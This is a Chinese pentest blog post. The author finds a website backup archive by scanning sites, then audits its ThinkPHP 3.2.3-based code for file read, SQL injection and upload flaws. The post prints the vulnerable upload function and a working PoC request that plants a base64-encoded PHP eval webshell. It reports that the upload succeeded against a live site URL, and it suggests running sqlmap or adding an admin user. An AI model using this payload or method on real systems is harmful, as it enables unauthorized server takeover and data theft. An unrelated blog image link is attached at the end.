> 更多渗透技能 欢迎搜索公众号:白帽子左一
作者:掌控安全- 秋紫山
因为自己一直在学习用python编写小工具,然后看到了一些文章关于扫描网站后台备份文件的脚本
我就参照着写了好久的脚本代码,都是低效率代码
然后勉强算是写好了,运行了一下
哎、查看结果还真扫出来了两个包,还是有点用的
好了进入正题:
一、框架分析
解压发现,目录有thinkphp,在tp的基础上进行的二次开发,tp存在的漏洞肯定存在!
(因为一些文件的名字可以找到该模板、所以打码了)
查看一下tp的版本:3.2.3
Tp3.2.3 可能存在缓存漏洞、sql注入漏洞,sql注入暂时放放,缓存漏洞看看有没有。
参考一下:ThinkPHP RCE漏洞分析合集
(该文章首发于社区文库、有需要的小伙伴可以文末扫码找助教领取社区邀请码,观看更多文章)
要存在漏洞的话,肯定需要调用tp框架的Cache::set方法,查找全局,看有没有调用。可惜没有调用,那就凉了。
二、网站结构分析
一键开启自动审计!
趁着这个时间大致浏览了一下网站的结构,它没有把全部功能写到controller里面
没有将index.php作为唯一的入口文件,可以访问其他文件进入其他控制器
它采用tp的URL_MODEL=0的模式,index.php对m传参进行清洗
网站如果访问index.php默认访问Home模块的index控制器。
而想进入后台,则要找到入口文件××.php,它的m值为默认Admin、进入admin模块。
所以要进后台,如果××.php没有改变的话,那么访问××.php就可以了。
三、漏洞代码审计
(一)、傻瓜式漏洞
明显的任意文件读取漏洞,而且出错可以报出网站根目录。
这个找到敏感信息便可以读取。
数据库账号密码就来了~
(二)、后台登录sql注入
什么??直接拼接post的值,实锤sql注入,但是不能万能钥匙登录
因为无论如何都要验证加密了的password是否正确,幸运的是这里可以用显错注入
上sqlmap跑一下就可以了。
或者添加一个用户,进入后台搞事情嘻嘻嘻。
这里暂时先不进去,看看前台有什么可以搞的。
(三)、前台sql注入
一堆sql注入,我不一一验证了,各位大佬们肯定能一眼看出来,比如以下:
都没有过滤,而且又没有使用tp的自带函数,那就凉了嘛。
(四)、前台文件上传漏洞
经过不懈的努力,终于找到了一个文件上传的漏洞,这道题有点像ctf,
看来还是要多做点ctf的题呀,多练练思维。
以下为漏洞代码:
/*** 公共上传图片方法*/public function Upload(){$base64_image_content = I("post.img");$image_name = I("post.name");$len = I("post.size");$baseLen = strlen($base64_image_content);if($len!=$baseLen) $this->error("上传图片不完整");if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)){$uploadFolder = C('UPLOADPATH').date("Ymd")."/";if(!is_dir($uploadFolder)){if(!mkdir($uploadFolder, 0755, true)){$this->error('创建文件失败');}}$type = $result[2];if(empty($image_name)){$new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";}else{$new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";}$img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));if (file_put_contents($new_file,$img_64)){$this->success(complete_url($new_file));}}else{$this->error("图片不存在");}}
}
由图可知,代码使用tp框架的函数I() 来获取数据,具有一定的安全性,它的函数实现了html实体转化。
但是呢,这里他使用了base64的编码进行输入,所以<>都可以生效。
接下来看一下满足的条件:
1.Size的post传参和$baseLen数据长度一样,也就是size就是img传参的长度。
2.preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)//只要输入的img满足data: image/jpg;base64, 就能匹配出三个结果:
3.是否存在目录。(肯定有的~)
代码往下走就是:$type=$result[2];
也就是说type是文件后缀,那让result[2]=php不就完美了?
于是就有:data: image/php;base64
再接着这段代码:
if(empty($image_name)){$new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";}else{$new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";}$img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));if (file_put_contents($new_file,$img_64)){$this->success(complete_url($new_file));}}else{$this->error("图片不存在");}
判断有无name传参,有就拼接目录、时间、和$type。其中type为后缀,那就OK,可以上传php文件。
最后看一下file_put_contents两个参数,$new_file 为写入的目录文件,$img_64为写入的内容。内容要是一句话木马才行。
$img_64是先进行替代操作str_replace($result[1], ‘’, $base64_image_content),再进行base64解码。
所以data: image/jpg;base64,之后的内容是一句话木马的base64的加密内容就行。
具体name的传参无关紧要,而size是要等于img的字符长度,即可触发文件上传漏洞。
总结就是,该漏洞因为太相信上传的img文件类型,而触发文件上传漏洞。
综上可得到poc为:
img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==& &name=jpg&size=63
PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==是一句话木马base加密的内容。
其中,要连接一句话木马就要知道时间戳。
本地复现:
上传的文件名是jpg_0430130105.php 文件名不难猜,月日时秒
尝试实操:
url为:http://url/index.php?m=&c=indexAjax&a=upload
poc为:
img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==&name=jpg&size=63
上传成功,看看效果:
成功。
菜刀就不连了!
开溜是不可能开溜的,后续我还会再尝试一下这个审计一下,若有其他新奇的漏洞代码,我再上传。
心得体会:
我自己通过学习了大约一星期的tp框架,才入门了这个审计
我觉得、不一定自己要有多懂代码、不一定要非得自己写一个网站
但是框架里面的应用包括内置函数这些一定要懂!
这就像一个手机app一样,基本的操作方法会了之后,你就可以找出这个app有哪些小bug。
但是像大佬一样,审计框架里的内容,那可能还有很远的路要走,一起加油吧!
![[分享黑科技]纯js突破localstorage存储上线,远程抓取图片,并转码base64保存本地,最终实现整个网站所有静态资源离线到用户手机效果却不依赖浏览器的缓存机制,单页应用最新黑科技...](https://images0.cnblogs.com/blog/24991/201506/172322110603612.png)
